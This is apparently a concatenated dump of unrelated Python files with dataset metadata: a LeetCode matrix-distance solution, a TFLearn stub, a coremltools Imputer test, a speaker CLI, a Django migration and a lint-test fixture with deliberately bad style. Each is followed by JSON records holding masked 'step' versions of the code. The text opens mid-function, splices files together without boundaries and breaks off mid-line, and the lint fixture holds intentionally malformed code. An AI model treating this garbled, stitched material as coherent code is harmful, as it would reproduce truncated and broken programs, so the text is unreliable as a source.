if i - 1 < 0 or matrix[i - 1][j] >= cur:
pass
else:
continue
if j - 1 < 0 or matrix[i][j - 1] >= cur:
pass
else:
continue
if i + 1 >= row or matrix[i + 1][j] >= cur:
pass
else:
continue
if j + 1 >= col or matrix[i][j + 1] >= cur:
pass
else:
continue
flag = True
matrix[i][j] += 1
if not flag:
break
return matrix
if __name__ == '__main__':
solution = Solution()
data = [
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]
]
print(solution.updateMatrix(data))
data =[
[1, 0, 1, 1, 0, 0, 1, 0, 0, 1],
[0, 1, 1, 0, 1, 0, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 0, 0, 1, 0, 0],
[1, 0, 1, 0, 1, 1, 1, 1, 1, 1],
[0, 1, 0, 1, 1, 0, 0, 0, 0, 1],
[0, 0, 1, 0, 1, 1, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
[1, 0, 0, 0, 1, 1, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 0, 1, 0],
[1, 1, 1, 1, 0, 1, 0, 0, 1, 1]
]
result = [
[1,0,1,1,0,0,1,0,0,1],
[0,1,1,0,1,0,1,0,1,1],
[0,0,1,0,1,0,0,1,0,0],
[1,0,1,0,1,1,1,1,1,1],
[0,1,0,1,1,0,0,0,0,1],
[0,0,1,0,1,1,1,0,1,0],
[0,1,0,1,0,1,0,0,1,1],
[1,0,0,0,1,2,1,1,0,1],
[2,1,1,1,1,1,1,0,1,0],
[1,2,1,1,0,1,0,0,1,1]
]
true_result = [
[1,0,1,1,0,0,1,0,0,1],
[0,1,1,0,1,0,1,0,1,1],
[0,0,1,0,1,0,0,1,0,0],
[1,0,1,0,1,1,1,1,1,1],
[0,1,0,1,1,0,0,0,0,1],
[0,0,1,0,1,1,1,0,1,0],
[0,1,0,1,0,1,0,0,1,1],
[1,0,0,0,1,2,1,1,0,1],
[2,1,1,1,1,2,1,0,1,0],
[3,2,2,1,0,1,0,0,1,1]
]
|
normal
|
{
"blob_id": "1145050d82e614d5c248fc7e6a71720e6ff72414",
"index": 6055,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\n\nif __name__ == '__main__':\n solution = Solution()\n data = [[0, 0, 0, 0], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]]\n print(solution.updateMatrix(data))\n data = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, 1], [0,\n 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0], [0, 1, \n 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, \n 1, 1, 1, 1, 0, 1, 0], [1, 1, 1, 1, 0, 1, 0, 0, 1, 1]]\n result = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0, 1, 1\n ], [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [0, 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0], [0,\n 1, 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 2, 1, 1, 0, 1], [2, 1, \n 1, 1, 1, 1, 1, 0, 1, 0], [1, 2, 1, 1, 0, 1, 0, 0, 1, 1]]\n true_result = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0,\n 1, 1], [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, \n 1], [0, 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0],\n [0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 2, 1, 1, 0, 1], [2,\n 1, 1, 1, 1, 2, 1, 0, 1, 0], [3, 2, 2, 1, 0, 1, 0, 0, 1, 1]]\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2018/6/11 下午6:45\n# @Author : zhanzecheng\n# @File : 542.01矩阵1.py\n# @Software: PyCharm\n\"\"\"\n\n# 一个简单的循环方式来解决这个问题\n# 这一题的思路不错,用多次循环来计数\n# TODO: check 1\nclass Solution:\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\nif __name__ == '__main__':\n solution = Solution()\n data = [\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [1, 1, 1, 1]\n ]\n print(solution.updateMatrix(data))\n data =[\n [1, 0, 1, 1, 0, 0, 1, 0, 0, 1],\n [0, 1, 1, 0, 1, 0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1, 0, 0, 1, 0, 0],\n [1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [0, 1, 0, 1, 1, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 1, 1, 1, 0, 1, 0],\n [0, 1, 0, 1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1, 1, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 0, 1, 0],\n [1, 1, 1, 1, 0, 1, 0, 0, 1, 1]\n ]\n\n result = [\n [1,0,1,1,0,0,1,0,0,1],\n [0,1,1,0,1,0,1,0,1,1],\n [0,0,1,0,1,0,0,1,0,0],\n [1,0,1,0,1,1,1,1,1,1],\n [0,1,0,1,1,0,0,0,0,1],\n [0,0,1,0,1,1,1,0,1,0],\n [0,1,0,1,0,1,0,0,1,1],\n [1,0,0,0,1,2,1,1,0,1],\n [2,1,1,1,1,1,1,0,1,0],\n [1,2,1,1,0,1,0,0,1,1]\n ]\n true_result = [\n [1,0,1,1,0,0,1,0,0,1],\n [0,1,1,0,1,0,1,0,1,1],\n [0,0,1,0,1,0,0,1,0,0],\n [1,0,1,0,1,1,1,1,1,1],\n [0,1,0,1,1,0,0,0,0,1],\n [0,0,1,0,1,1,1,0,1,0],\n [0,1,0,1,0,1,0,0,1,1],\n [1,0,0,0,1,2,1,1,0,1],\n [2,1,1,1,1,2,1,0,1,0],\n [3,2,2,1,0,1,0,0,1,1]\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Let's look at the lowercase letters.
import string
alphabet = " " + string.ascii_lowercase
|
normal
|
{
"blob_id": "da3be0d3b815e11d292a7c7e8f5ce32b35580f98",
"index": 1016,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nalphabet = ' ' + string.ascii_lowercase\n",
"step-3": "import string\nalphabet = ' ' + string.ascii_lowercase\n",
"step-4": "# Let's look at the lowercase letters.\nimport string\nalphabet = \" \" + string.ascii_lowercase\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class TflearnDataSourceExtraTemplate(object):
"""
Base class for TFLearn's DataSource (if we use wrapping).
Parameters:
----------
rewrite_data_aug : bool
use wrapper for data augmentation
"""
def __init__(self, rewrite_data_aug=False):
self.rewrite_data_aug = rewrite_data_aug
|
normal
|
{
"blob_id": "70c084dab8469ca34b0e3e5174101111e695f1ca",
"index": 6638,
"step-1": "<mask token>\n",
"step-2": "class TflearnDataSourceExtraTemplate(object):\n <mask token>\n <mask token>\n",
"step-3": "class TflearnDataSourceExtraTemplate(object):\n <mask token>\n\n def __init__(self, rewrite_data_aug=False):\n self.rewrite_data_aug = rewrite_data_aug\n",
"step-4": "class TflearnDataSourceExtraTemplate(object):\n \"\"\"\n Base class for TFLearn's DataSource (if we use wrapping).\n\n Parameters:\n ----------\n rewrite_data_aug : bool\n use wrapper for data augmentation\n \"\"\"\n\n def __init__(self, rewrite_data_aug=False):\n self.rewrite_data_aug = rewrite_data_aug\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import unittest
from distutils.version import StrictVersion
import numpy as np
from coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION
if _HAS_SKLEARN:
import sklearn
from coremltools.converters import sklearn as converter
try:
# scikit-learn >= 0.21
from sklearn.impute import SimpleImputer as Imputer
sklearn_class = sklearn.impute.SimpleImputer
except ImportError:
# scikit-learn < 0.21
from sklearn.preprocessing import Imputer
sklearn_class = sklearn.preprocessing.Imputer
@unittest.skipIf(not _HAS_SKLEARN, "Missing sklearn. Skipping tests.")
class ImputerTestCase(unittest.TestCase):
"""
Unit test class for testing scikit-learn converter.
"""
@classmethod
def setUpClass(self):
"""
Set up the unit test by loading the dataset and training a model.
"""
from sklearn.datasets import load_boston
scikit_data = load_boston()
# axis parameter deprecated in SimpleImputer >= 0.22. which now imputes
# only along columns as desired here.
if _SKLEARN_VERSION >= StrictVersion("0.22"):
scikit_model = Imputer(strategy="most_frequent")
else:
scikit_model = Imputer(strategy="most_frequent", axis=0)
scikit_data["data"][1, 8] = np.NaN
input_data = scikit_data["data"][:, 8].reshape(-1, 1)
scikit_model.fit(input_data, scikit_data["target"])
# Save the data and the model
self.scikit_data = scikit_data
self.scikit_model = scikit_model
def test_conversion(self):
spec = converter.convert(self.scikit_model, "data", "out").get_spec()
self.assertIsNotNone(spec)
# Test the model class
self.assertIsNotNone(spec.description)
# Test the interface
self.assertTrue(spec.pipeline.models[-1].HasField("imputer"))
def test_conversion_bad_inputs(self):
# Error on converting an untrained model
with self.assertRaises(Exception):
model = Imputer()
spec = converter.convert(model, "data", "out")
# Check the expected class during covnersion.
with self.assertRaises(Exception):
from sklearn.linear_model import LinearRegression
model = LinearRegression()
spec = converter.convert(model, "data", "out")
|
normal
|
{
"blob_id": "d3d90b8ccd0ec449c84ac0316c429b33353f4518",
"index": 8900,
"step-1": "<mask token>\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n <mask token>\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-2": "<mask token>\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-3": "<mask token>\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-4": "import unittest\nfrom distutils.version import StrictVersion\nimport numpy as np\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-5": "# Copyright (c) 2017, Apple Inc. All rights reserved.\n#\n# Use of this source code is governed by a BSD-3-clause license that can be\n# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause\n\nimport unittest\nfrom distutils.version import StrictVersion\n\nimport numpy as np\n\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\n\nif _HAS_SKLEARN:\n import sklearn\n\n from coremltools.converters import sklearn as converter\n try:\n # scikit-learn >= 0.21\n from sklearn.impute import SimpleImputer as Imputer\n\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n # scikit-learn < 0.21\n from sklearn.preprocessing import Imputer\n\n sklearn_class = sklearn.preprocessing.Imputer\n\[email protected](not _HAS_SKLEARN, \"Missing sklearn. Skipping tests.\")\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n\n scikit_data = load_boston()\n # axis parameter deprecated in SimpleImputer >= 0.22. which now imputes\n # only along columns as desired here.\n if _SKLEARN_VERSION >= StrictVersion(\"0.22\"):\n scikit_model = Imputer(strategy=\"most_frequent\")\n else:\n scikit_model = Imputer(strategy=\"most_frequent\", axis=0)\n scikit_data[\"data\"][1, 8] = np.NaN\n\n input_data = scikit_data[\"data\"][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data[\"target\"])\n\n # Save the data and the model\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, \"data\", \"out\").get_spec()\n self.assertIsNotNone(spec)\n\n # Test the model class\n self.assertIsNotNone(spec.description)\n\n # Test the interface\n self.assertTrue(spec.pipeline.models[-1].HasField(\"imputer\"))\n\n def test_conversion_bad_inputs(self):\n # Error on converting an untrained model\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, \"data\", \"out\")\n\n # Check the expected class during covnersion.\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n\n model = LinearRegression()\n spec = converter.convert(model, \"data\", \"out\")\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python3
import argparse
from speaker.main import run
def parse_args():
parser = argparse.ArgumentParser(description='Network speaker device.')
parser.add_argument('-d', '--debug', action='store_true',
help='enable debugging messages')
parser.add_argument('--host', type=str,
help='IP address to bind network services to')
parser.add_argument('--grpc-port', type=int,
help='port for the gRPC service')
parser.add_argument('--rtsp-port', type=int,
help='port for the RTSP service')
parser.add_argument('--spotifyd-path', type=str,
help='path to a spotifyd binary')
return parser.parse_args()
if __name__ == '__main__':
run(parse_args())
|
normal
|
{
"blob_id": "bb173d8869039f8bbd3e35529cf2d99b26d2b8ff",
"index": 7130,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-4": "import argparse\nfrom speaker.main import run\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-5": "#!/usr/bin/env python3\n\nimport argparse\nfrom speaker.main import run\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true',\n help='enable debugging messages')\n parser.add_argument('--host', type=str,\n help='IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int,\n help='port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int,\n help='port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str,\n help='path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.7 on 2019-03-23 17:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('currency_exchange', '0007_auto_20190323_1751'),
]
operations = [
migrations.AddField(
model_name='tasks',
name='hours',
field=models.DecimalField(decimal_places=12, default=0, max_digits=24),
),
migrations.AddField(
model_name='tasks',
name='status',
field=models.CharField(default='in progress', max_length=100),
),
]
|
normal
|
{
"blob_id": "1f63ce2c791f0b8763aeae15df4875769f6de848",
"index": 4942,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('currency_exchange', '0007_auto_20190323_1751')]\n operations = [migrations.AddField(model_name='tasks', name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=\n 24)), migrations.AddField(model_name='tasks', name='status', field=\n models.CharField(default='in progress', max_length=100))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('currency_exchange', '0007_auto_20190323_1751')]\n operations = [migrations.AddField(model_name='tasks', name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=\n 24)), migrations.AddField(model_name='tasks', name='status', field=\n models.CharField(default='in progress', max_length=100))]\n",
"step-5": "# Generated by Django 2.1.7 on 2019-03-23 17:14\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('currency_exchange', '0007_auto_20190323_1751'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tasks',\n name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=24),\n ),\n migrations.AddField(\n model_name='tasks',\n name='status',\n field=models.CharField(default='in progress', max_length=100),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
from typing import ClassVar, List
print(1, 2)
# Annotated function (Issue #29)
def foo(x: int) -> int:
return x + 1
# Annotated variables #575
CONST: int = 42
class Class:
cls_var: ClassVar[str]
def m(self):
xs: List[int] = []
# True and False are keywords in Python 3 and therefore need a space.
#: E275:13 E275:14
norman = True+False
#: E302+3:0
def a():
pass
async def b():
pass
# Okay
async def add(a: int = 0, b: int = 0) -> int:
return a + b
# Previously E251 four times
#: E221:5
async def add(a: int = 0, b: int = 0) -> int:
return a + b
# Previously just E272+1:5 E272+4:5
#: E302+3 E221:5 E221+3:5
async def x():
pass
async def x(y: int = 1):
pass
#: E704:16
async def f(x): return 2
a[b1, :] == a[b1, ...]
# Annotated Function Definitions
# Okay
def munge(input: AnyStr, sep: AnyStr = None, limit=1000,
extra: Union[str, dict] = None) -> AnyStr:
pass
#: E225:24 E225:26
def x(b: tuple = (1, 2))->int:
return a + b
#: E252:11 E252:12 E231:8
def b(a:int=1):
pass
if alpha[:-i]:
*a, b = (1, 2, 3)
# Named only arguments
def foo(*, asdf):
pass
def foo2(bar, *, asdf=2):
pass
|
normal
|
{
"blob_id": "689c6c646311eba1faa93cc72bbe1ee4592e45bc",
"index": 8392,
"step-1": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-3": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n\n\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-4": "<mask token>\nprint(1, 2)\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\nCONST: int = 42\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\nasync def b():\n pass\n\n\nasync def add(a: int=0, b: int=0) ->int:\n return a + b\n\n\nasync def add(a: int=0, b: int=0) ->int:\n return a + b\n\n\nasync def x():\n pass\n\n\nasync def x(y: int=1):\n pass\n\n\nasync def f(x):\n return 2\n\n\na[b1, :] == a[b1, ...]\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\ndef x(b: tuple=(1, 2)) ->int:\n return a + b\n\n\ndef b(a: int=1):\n pass\n\n\nif alpha[:-i]:\n *a, b = 1, 2, 3\n\n\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-5": "#!/usr/bin/env python3\nfrom typing import ClassVar, List\n\nprint(1, 2)\n\n\n# Annotated function (Issue #29)\ndef foo(x: int) -> int:\n return x + 1\n\n\n# Annotated variables #575\nCONST: int = 42\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n# True and False are keywords in Python 3 and therefore need a space.\n#: E275:13 E275:14\nnorman = True+False\n\n\n#: E302+3:0\ndef a():\n pass\n\nasync def b():\n pass\n\n\n# Okay\nasync def add(a: int = 0, b: int = 0) -> int:\n return a + b\n\n\n# Previously E251 four times\n#: E221:5\nasync def add(a: int = 0, b: int = 0) -> int:\n return a + b\n\n\n# Previously just E272+1:5 E272+4:5\n#: E302+3 E221:5 E221+3:5\nasync def x():\n pass\n\nasync def x(y: int = 1):\n pass\n\n\n#: E704:16\nasync def f(x): return 2\n\n\na[b1, :] == a[b1, ...]\n\n\n# Annotated Function Definitions\n# Okay\ndef 